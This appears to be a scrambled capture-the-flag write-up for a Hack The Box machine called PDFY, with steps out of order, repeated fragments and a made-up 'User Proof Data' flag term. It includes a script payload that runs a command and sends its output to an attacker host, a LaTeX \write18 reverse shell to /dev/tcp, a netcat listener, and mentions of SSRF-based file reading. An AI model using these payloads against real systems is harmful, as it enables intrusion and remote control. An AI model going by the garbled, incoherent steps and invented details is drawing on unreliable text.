Pdfy Htb Writeup Upd [top] May 2026

Create a malicious .tex file:

<script> document.write('<img src="http://your-ip:4444/?c=' + require('child_process').execSync('id') + '">'); </script> However, for PDFY specifically, the working exploit often involves pdftex and \write18 . After testing command injection, send a reverse shell payload.

ls -la /home/ You might find a user (e.g., robert or pdfuser ). Check their home directory: pdfy htb writeup upd

Example using bash -i :

Check sudo rights:

nc -lvnp 4444 Once connected, you’re www-data . Now, look for the flag. Step 8: Capturing the User Proof Data (UPD) The UPD for PDFY is typically located in the home directory of a low-privilege user. Let's enumerate.

\immediate\write18/bin/bash -c "bash -i >& /dev/tcp/10.10.14.XX/5555 0>&1" After executing the pdftex exploit: Create a malicious

The User Proof Data flag is often not in /etc/passwd , but this confirms LFI via SSRF. Step 4: Reading the Source Code Using the SSRF, read the main PHP file that handles PDF generation.